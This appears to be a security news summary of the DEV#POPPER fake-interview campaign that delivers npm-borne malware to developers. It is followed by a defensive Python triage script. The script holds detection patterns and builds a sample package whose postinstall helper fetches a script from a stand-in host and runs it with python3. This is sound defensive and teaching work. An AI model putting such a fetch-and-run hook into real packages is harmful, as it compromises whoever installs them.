Bogus npm Packages Used to Trick Software Developers into Installing Malware

April 27, 2024 at 02:00AM

A social engineering campaign tracked as DEV#POPPER is targeting software developers with fraudulent job interviews that lead them to download and run a malicious npm package, which in turn delivers a Python backdoor. The campaign is attributed to North Korean threat actors, who pose as employers to distribute the malware, a sign of their continued investment in developer-focused tradecraft.

Key takeaways:

– An ongoing social engineering campaign, known as DEV#POPPER, targets software developers with bogus npm packages under the guise of a job interview, tricking them into installing a Python backdoor. The campaign is tracked by cybersecurity firm Securonix, which links it to North Korean threat actors.

– During the fraudulent interviews, developers are asked to download and run software from sources that appear legitimate, such as GitHub. The software carries a malicious Node.js payload that compromises the developer's system once executed.

– The activity overlaps with a campaign first disclosed in late November 2023, in which the actors pose as employers to lure software developers into installing the malware families BeaverTail and InvisibleFerret through the interview process. Malicious packages on the npm registry have also been uncovered that deliver the same malware families to developer systems.

– That campaign, tracked as Contagious Interview and focused on developers, is considered distinct from Operation Dream Job (aka DeathNote or NukeSped), a long-running Lazarus Group operation from North Korea that targets professionals in other sectors with malware.

– The attack chain detailed by Securonix starts with a ZIP archive hosted on GitHub that contains a seemingly innocuous npm module. The module harbors a malicious JavaScript file (BeaverTail), which, once run, retrieves a Python backdoor (InvisibleFerret) from a remote server. The backdoor supports command execution, file enumeration and exfiltration, and clipboard and keystroke logging.

– North Korean threat actors continue to update their cyber attack arsenal, consistently improving their tradecraft to hide their actions, blend into host systems and networks, and siphon off data for financial gain.

– Maintaining a security-focused mindset, especially during intense and stressful situations like job interviews, is crucial to defend against social engineering attacks.
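The chain above hinges on a developer running an unvetted npm project, so a cheap pre-install triage step is worth having alongside the "security-focused mindset" advice. The following is an added example, not code from the original article or from Securonix: it flags npm lifecycle scripts (which npm executes automatically during `npm install`) and JavaScript that spawns processes, fetches content from the network, invokes Python, or carries a large encoded blob. The indicator patterns are an assumption, and the sample package the script builds in a temporary directory is constructed for illustration; it is not BeaverTail and it contacts nothing.

```python
"""Pre-install triage of an unpacked npm project.

Added example, not code from the original article or from Securonix.
Flags the two things the described chain depends on: lifecycle scripts that
npm runs during install, and JavaScript that spawns processes or fetches a
second stage. The indicator set and the sample package are constructed here.
"""
from __future__ import annotations

import json
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# npm executes these automatically on `npm install`; an interview task that
# needs any of them deserves a close read before it runs.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Hypothetical indicator set (an assumption, not a published signature): the
# capabilities a downloader/loader needs. A hit means "read this file",
# not "this is malware".
INDICATORS = {
    "spawns_process": re.compile(r"child_process|\b(spawn|exec)(Sync)?\s*\("),
    "dynamic_code": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "network_fetch": re.compile(
        r"\bhttps?\.(get|request)\s*\(|\bfetch\s*\(|require\(['\"](axios|node-fetch)['\"]\)"),
    "runs_python": re.compile(r"\bpython3?\b"),
    "encoded_blob": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
}


@dataclass
class Finding:
    path: str     # relative to the project root, POSIX separators
    kind: str     # "lifecycle:<hook>" or an INDICATORS key
    detail: str   # the hook command or the matched text


def audit_package(root: Path) -> list[Finding]:
    """Return a finding for every lifecycle hook and every indicator hit."""
    findings: list[Finding] = []
    manifest = root / "package.json"
    if manifest.is_file():
        scripts = json.loads(manifest.read_text(encoding="utf-8")).get("scripts", {})
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                findings.append(Finding("package.json", f"lifecycle:{hook}", scripts[hook]))
    # Walk every .js file, including anything vendored under node_modules:
    # the package in the described chain looked like an ordinary module.
    for js in sorted(root.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="replace")
        rel = js.relative_to(root).as_posix()
        for kind, pattern in INDICATORS.items():
            match = pattern.search(text)
            if match:
                findings.append(Finding(rel, kind, match.group(0)[:60]))
    return findings


def build_sample_package(base: Path) -> Path:
    """Write a constructed package with the shape of the chain: a harmless
    entry point, a postinstall hook, and a helper that fetches a remote
    script and hands it to Python. Not the real malware; the host name is
    invalid by design so nothing is ever contacted."""
    root = base / "interview-task"
    (root / "lib").mkdir(parents=True)
    (root / "package.json").write_text(json.dumps({
        "name": "interview-task",
        "version": "1.0.0",
        "main": "index.js",
        "scripts": {"test": "node test.js", "postinstall": "node lib/setup.js"},
    }), encoding="utf-8")
    (root / "index.js").write_text("module.exports = (a, b) => a + b;\n", encoding="utf-8")
    (root / "lib" / "setup.js").write_text(
        "const https = require('https');\n"
        "const fs = require('fs');\n"
        "const { execSync } = require('child_process');\n"
        "https.get('https://example.invalid/stage2', res => {\n"
        "  res.pipe(fs.createWriteStream('.cache.py'))\n"
        "     .on('finish', () => execSync('python3 .cache.py'));\n"
        "});\n",
        encoding="utf-8")
    return root


def audit_sample() -> list[Finding]:
    """Build the constructed package in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_package(build_sample_package(Path(tmp)))


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f.path}: {f.kind} -> {f.detail}")
```

Run it against a freshly unzipped project before `npm install` (or install with `--ignore-scripts` and audit first). The postinstall hook plus a helper that combines `child_process`, an HTTPS fetch and a `python3` invocation is the combination that should stop you; an ordinary coding exercise has no reason to need all three.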
